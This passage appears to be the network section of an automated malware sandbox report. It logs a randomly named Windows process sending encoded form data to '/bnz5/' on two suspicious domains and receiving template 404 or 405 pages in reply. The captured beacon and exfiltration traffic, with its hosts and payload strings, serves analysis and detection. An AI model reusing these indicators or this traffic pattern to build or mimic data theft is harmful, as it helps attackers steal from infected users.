                                                                                                      Data Ascii: 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#007067}p:last-of-type{margin-bottom:0}.inline-code{display:inline-
                                                                                                      Apr 16, 2024 12:00:59.290275097 CEST  441  IN
                                                                                                      Data Ascii: support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-code request-id"><code>11b01HVK5MH2VHJ14N108E9M8MFJM</code></span></div></div></div><script>(function(){document.refer


                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                      25          192.168.2.5  49744        203.161.50.128  80                2940  C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                      Apr 16, 2024 12:01:04.680532932 CEST  724  OUT  POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.fusionndustries.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.fusionndustries.xyz
                                                                                                      Referer: http://www.fusionndustries.xyz/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=8LsJsTwAWhgH1fVoXvwhcliI4iU99U7WGE0A3e61cBj7S3Wed/2QJwN6kMEvbM2O22vLm6Mf5FB1aU0eOdq3eb9CqhUA+CSTJ5g8bvuY689BAKk9ERqSYS69Nf8HsNEqcTzVCeDrSyH0d8x0Qdbb4GzPERo+qFOlmhDWwmgnJqjtrgVKO04qP/LXaAcYX0paWrvZhXw=
                                                                                                      Apr 16, 2024 12:01:04.847704887 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:01:04 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 11834
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>DGital - Digital Agency HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500&family=Jost:wght@500;600;700&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" rel="stylesheet"> <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> <link href="lib/lightbox/css/
                                                                                                      Apr 16, 2024 12:01:04.847744942 CEST  1289  IN
                                                                                                      Data Ascii: lightbox.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><bo
                                                                                                      Apr 16, 2024 12:01:04.847784996 CEST  1289  IN
                                                                                                      Data Ascii: tton> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav mx-auto py-0"> <a href="index.html" class="nav-item nav-link">Home</a>
                                                                                                      Apr 16, 2024 12:01:04.847825050 CEST  1289  IN
                                                                                                      Data Ascii: </div> </nav> <div class="container-xxl py-5 bg-primary hero-header"> <div class="container my-5 py-5 px-lg-5"> <div class="row g-5 py-5"> <div c
                                                                                                      Apr 16, 2024 12:01:04.847989082 CEST  1289  IN
                                                                                                      Data Ascii: px-lg-5 text-center"> <div class="row justify-content-center"> <div class="col-lg-6"> <i class="bi bi-exclamation-triangle display-1 text-primary"></i> <h
                                                                                                      Apr 16, 2024 12:01:04.848026037 CEST  1289  IN
                                                                                                      Data Ascii: <p><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-twitter"></i></a
                                                                                                      Apr 16, 2024 12:01:04.848124981 CEST  1289  IN
                                                                                                      Data Ascii: ss="section-title text-white h5 mb-4">Gallery<span></span></p> <div class="row g-2"> <div class="col-4"> <img class="img-fluid" src="img/portfolio-1.jpg" al
                                                                                                      Apr 16, 2024 12:01:04.848161936 CEST  1289  IN
                                                                                                      Data Ascii: -6 col-lg-3"> <p class="section-title text-white h5 mb-4">Newsletter<span></span></p> <p>Lorem ipsum dolor sit amet elit. Phasellus nec pretium mi. Curabitur facilisis ornare velit non vulpu</p
                                                                                                      Apr 16, 2024 12:01:04.848339081 CEST  1289  IN
                                                                                                      Data Ascii: ink/backlink, you can purchase the Credit Removal License from "https://htmlcodex.com/credit-removal". Thank you for your support. ***/-->Designed By <a class="border-bottom" href="https://htmlcodex.com">HTML Codex</a>
                                                                                                      Apr 16, 2024 12:01:04.848373890 CEST  379  IN
                                                                                                      Data Ascii: aypoints/waypoints.min.js"></script> <script src="lib/counterup/counterup.min.js"></script> <script src="lib/owlcarousel/owl.carousel.min.js"></script> <script src="lib/isotope/isotope.pkgd.min.js"></script> <script src="li


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 49745 | 203.161.50.128 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 12:01:07.362704992 CEST | 744 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.fusionndustries.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.fusionndustries.xyz
                                                                                                      Referer: http://www.fusionndustries.xyz/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=8LsJsTwAWhgH3/lobsYhUliJkyU9z06+GE4A3fPqczH7SSyec+2QIwN6qsEmG83j22jDm7wf5F91aRIeOKW4M79A/RVGziSTJ5g8brD968lBA6U9LULEei6+Kf8HoNEUcTzrCc3VSwP0d+p0QMbYyGzVZBpRihXPmy3m5mVOdJCVj24gUWwCcfnvKTUvGEIzMI/p/Amcn1jBfaR4Hy/7iA0GZJSz
Apr 16, 2024 12:01:07.532691002 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:01:07 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 11834
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>DGital - Digital Agency HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500&family=Jost:wght@500;600;700&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" rel="stylesheet"> <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> <link href="lib/lightbox/css/
Apr 16, 2024 12:01:07.532733917 CEST | 1289 | IN
Data Ascii: lightbox.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><bo
Apr 16, 2024 12:01:07.532773018 CEST | 1289 | IN
Data Ascii: tton> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav mx-auto py-0"> <a href="index.html" class="nav-item nav-link">Home</a>
Apr 16, 2024 12:01:07.532813072 CEST | 1289 | IN
Data Ascii: </div> </nav> <div class="container-xxl py-5 bg-primary hero-header"> <div class="container my-5 py-5 px-lg-5"> <div class="row g-5 py-5"> <div c
Apr 16, 2024 12:01:07.532852888 CEST | 1289 | IN
Data Ascii: px-lg-5 text-center"> <div class="row justify-content-center"> <div class="col-lg-6"> <i class="bi bi-exclamation-triangle display-1 text-primary"></i> <h
Apr 16, 2024 12:01:07.532890081 CEST | 1289 | IN
Data Ascii: <p><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-twitter"></i></a
Apr 16, 2024 12:01:07.532928944 CEST | 1289 | IN
Data Ascii: ss="section-title text-white h5 mb-4">Gallery<span></span></p> <div class="row g-2"> <div class="col-4"> <img class="img-fluid" src="img/portfolio-1.jpg" al
Apr 16, 2024 12:01:07.532969952 CEST | 1289 | IN
Data Ascii: -6 col-lg-3"> <p class="section-title text-white h5 mb-4">Newsletter<span></span></p> <p>Lorem ipsum dolor sit amet elit. Phasellus nec pretium mi. Curabitur facilisis ornare velit non vulpu</p
Apr 16, 2024 12:01:07.533127069 CEST | 1289 | IN
Data Ascii: ink/backlink, you can purchase the Credit Removal License from "https://htmlcodex.com/credit-removal". Thank you for your support. ***/-->Designed By <a class="border-bottom" href="https://htmlcodex.com">HTML Codex</a>
Apr 16, 2024 12:01:07.533163071 CEST | 379 | IN
Data Ascii: aypoints/waypoints.min.js"></script> <script src="lib/counterup/counterup.min.js"></script> <script src="lib/owlcarousel/owl.carousel.min.js"></script> <script src="lib/isotope/isotope.pkgd.min.js"></script> <script src="li


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 49746 | 203.161.50.128 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 12:01:10.055141926 CEST | 1761 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.fusionndustries.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.fusionndustries.xyz
                                                                                                      Referer: http://www.fusionndustries.xyz/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Apr 16, 2024 12:01:10.223800898 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:01:10 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 11834
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>DGital - Digital Agency HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500&family=Jost:wght@500;600;700&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" rel="stylesheet"> <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> <link href="lib/lightbox/css/
                                                                                                      Apr 16, 2024 12:01:10.223840952 CEST1289INData Raw: 6c 69 67 68 74 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d
                                                                                                      Data Ascii: lightbox.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><bo
                                                                                                      Apr 16, 2024 12:01:10.223877907 CEST1289INData Raw: 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 22 6e 61 76 62 61 72 43 6f 6c 6c 61 70 73 65 22 3e 0d
                                                                                                      Data Ascii: tton> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav mx-auto py-0"> <a href="index.html" class="nav-item nav-link">Home</a>
                                                                                                      Apr 16, 2024 12:01:10.223916054 CEST1289INData Raw: 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6e 61 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 78 78 6c 20 70 79 2d 35 20 62 67
                                                                                                      Data Ascii: </div> </nav> <div class="container-xxl py-5 bg-primary hero-header"> <div class="container my-5 py-5 px-lg-5"> <div class="row g-5 py-5"> <div c
                                                                                                      Apr 16, 2024 12:01:10.223953009 CEST1289INData Raw: 20 70 78 2d 6c 67 2d 35 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 22 3e 0d 0a
                                                                                                      Data Ascii: px-lg-5 text-center"> <div class="row justify-content-center"> <div class="col-lg-6"> <i class="bi bi-exclamation-triangle display-1 text-primary"></i> <h
                                                                                                      Apr 16, 2024 12:01:10.223989964 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c 6f 70 65 20 6d 65 2d 33 22 3e 3c 2f 69 3e 69 6e 66 6f 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 3c 2f 70 3e 0d 0a 20 20 20
                                                                                                      Data Ascii: <p><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-twitter"></i></a
                                                                                                      Apr 16, 2024 12:01:10.224159002 CEST1289INData Raw: 73 73 3d 22 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 20 74 65 78 74 2d 77 68 69 74 65 20 68 35 20 6d 62 2d 34 22 3e 47 61 6c 6c 65 72 79 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                      Data Ascii: ss="section-title text-white h5 mb-4">Gallery<span></span></p> <div class="row g-2"> <div class="col-4"> <img class="img-fluid" src="img/portfolio-1.jpg" al
                                                                                                      Apr 16, 2024 12:01:10.224195957 CEST1289INData Raw: 2d 36 20 63 6f 6c 2d 6c 67 2d 33 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 20 74 65 78 74 2d 77 68 69 74 65 20 68 35 20 6d 62 2d 34 22
                                                                                                      Data Ascii: -6 col-lg-3"> <p class="section-title text-white h5 mb-4">Newsletter<span></span></p> <p>Lorem ipsum dolor sit amet elit. Phasellus nec pretium mi. Curabitur facilisis ornare velit non vulpu</p
                                                                                                      Apr 16, 2024 12:01:10.224404097 CEST1289INData Raw: 69 6e 6b 2f 62 61 63 6b 6c 69 6e 6b 2c 20 79 6f 75 20 63 61 6e 20 70 75 72 63 68 61 73 65 20 74 68 65 20 43 72 65 64 69 74 20 52 65 6d 6f 76 61 6c 20 4c 69 63 65 6e 73 65 20 66 72 6f 6d 20 22 68 74 74 70 73 3a 2f 2f 68 74 6d 6c 63 6f 64 65 78 2e
                                                                                                      Data Ascii: ink/backlink, you can purchase the Credit Removal License from "https://htmlcodex.com/credit-removal". Thank you for your support. ***/-->Designed By <a class="border-bottom" href="https://htmlcodex.com">HTML Codex</a>
Apr 16, 2024 12:01:10.224438906 CEST | 379 | IN
                                                                                                      Data Ascii: aypoints/waypoints.min.js"></script> <script src="lib/counterup/counterup.min.js"></script> <script src="lib/owlcarousel/owl.carousel.min.js"></script> <script src="lib/isotope/isotope.pkgd.min.js"></script> <script src="li


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 49747 | 203.161.50.128 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 12:01:12.739690065 CEST | 455 | OUT | GET /bnz5/?gr=xJEpvmsSZWMn08k0fswZUF3i8FJV6XmZDE9zwebvcwnWaSyOd7ieKTZxqd8LfY736VbykJAs8QtIZUIve9rpP7hx1kot6ym/I/JMbr2a3NM5FLBwcSvbdBi7Xsx3rbBzJg==&kFGTX=Q6OxIXo8tXD HTTP/1.1
                                                                                                      Host: www.fusionndustries.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Apr 16, 2024 12:01:12.904314041 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:01:12 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 11834
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>DGital - Digital Agency HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500&family=Jost:wght@500;600;700&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" rel="stylesheet"> <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> <link href="li
Apr 16, 2024 12:01:12.904356956 CEST | 1289 | IN
                                                                                                      Data Ascii: b/lightbox/css/lightbox.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet">
Apr 16, 2024 12:01:12.904393911 CEST | 1289 | IN
                                                                                                      Data Ascii: </button> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav mx-auto py-0"> <a href="index.html" class="nav-item nav-link">Home</a>
Apr 16, 2024 12:01:12.904434919 CEST | 1289 | IN
                                                                                                      Data Ascii: </a> </div> </nav> <div class="container-xxl py-5 bg-primary hero-header"> <div class="container my-5 py-5 px-lg-5"> <div class="row g-5 py-5">
Apr 16, 2024 12:01:12.904659033 CEST | 1289 | IN
                                                                                                      Data Ascii: lass="container px-lg-5 text-center"> <div class="row justify-content-center"> <div class="col-lg-6"> <i class="bi bi-exclamation-triangle display-1 text-primary"></i>
Apr 16, 2024 12:01:12.904697895 CEST | 1289 | IN
                                                                                                      Data Ascii: 7890</p> <p><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-t
Apr 16, 2024 12:01:12.905019999 CEST | 1289 | IN
                                                                                                      Data Ascii: <p class="section-title text-white h5 mb-4">Gallery<span></span></p> <div class="row g-2"> <div class="col-4"> <img class="img-fluid" src="img/port
Apr 16, 2024 12:01:12.905059099 CEST | 1289 | IN
                                                                                                      Data Ascii: v class="col-md-6 col-lg-3"> <p class="section-title text-white h5 mb-4">Newsletter<span></span></p> <p>Lorem ipsum dolor sit amet elit. Phasellus nec pretium mi. Curabitur facilisis ornare vel
Apr 16, 2024 12:01:12.905097008 CEST | 1289 | IN
                                                                                                      Data Ascii: k/attribution link/backlink, you can purchase the Credit Removal License from "https://htmlcodex.com/credit-removal". Thank you for your support. ***/-->Designed By <a class="border-bottom" href="https://htmlcodex.com">HTML Codex</a>
Apr 16, 2024 12:01:12.905132055 CEST | 394 | IN
                                                                                                      Data Ascii: ript src="lib/waypoints/waypoints.min.js"></script> <script src="lib/counterup/counterup.min.js"></script> <script src="lib/owlcarousel/owl.carousel.min.js"></script> <script src="lib/isotope/isotope.pkgd.min.js"></script>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 49748 | 134.122.178.172 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 12:01:18.841782093 CEST | 700 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.66bm99.shop
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.66bm99.shop
                                                                                                      Referer: http://www.66bm99.shop/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=MN4tdhdsbcN79pVOIP6ooJpVqqjmL1sZ1TBEkpQzcs/xe6G0Q62xs5n2a3kqhQ6nVHnXQoHT/z+CLT277GeMX+bCN1noLa2794F5qDXKYQowcAw5fo77BMo8zUuxqb8PqoYKIqRPbt1VdsYiBqNK6iYJQlm5BaYNRJuwoEZSBzVFutw/h4QQu6ZX1zZYlmjJXGduDlE=
Apr 16, 2024 12:01:19.203001976 CEST | 748 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      Date: Tue, 16 Apr 2024 10:01:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Server: cdn-ddos-cc
                                                                                                      X-Cache-Status: MISS
                                                                                                      Data Ascii: 22c<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 49749 | 134.122.178.172 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 12:01:21.695467949 CEST | 720 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.66bm99.shop
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.66bm99.shop
                                                                                                      Referer: http://www.66bm99.shop/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=MN4tdhdsbcN7s5lONoGogJpWpqjmelsd1TNEktIZcfbxdeC0CvKxv5n2VXkvsw6sVHqqQp7T/zaCLTG771mPXubACVnuF62794F5qDDgYQgwcwg5NZ74Isoj60uxub8TqoYsIr8UbvNVdtoiA/5L0iYLPVn9SOBEcauOs2IzGhM+vbdV7aY49a1vlgRv0WCgNlNedyR246Ogj0w60ejixvPXU+f/
Apr 16, 2024 12:01:22.047858953 CEST | 748 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      Date: Tue, 16 Apr 2024 10:01:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Server: cdn-ddos-cc
                                                                                                      X-Cache-Status: MISS
                                                                                                      Data Ascii: 22c<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 49750 | 134.122.178.172 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 12:01:24.563424110 CEST | 1737 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.66bm99.shop
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.66bm99.shop
                                                                                                      Referer: http://www.66bm99.shop/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Apr 16, 2024 12:01:24.930212021 CEST | 748 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      Date: Tue, 16 Apr 2024 10:01:24 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Server: cdn-ddos-cc
                                                                                                      X-Cache-Status: MISS
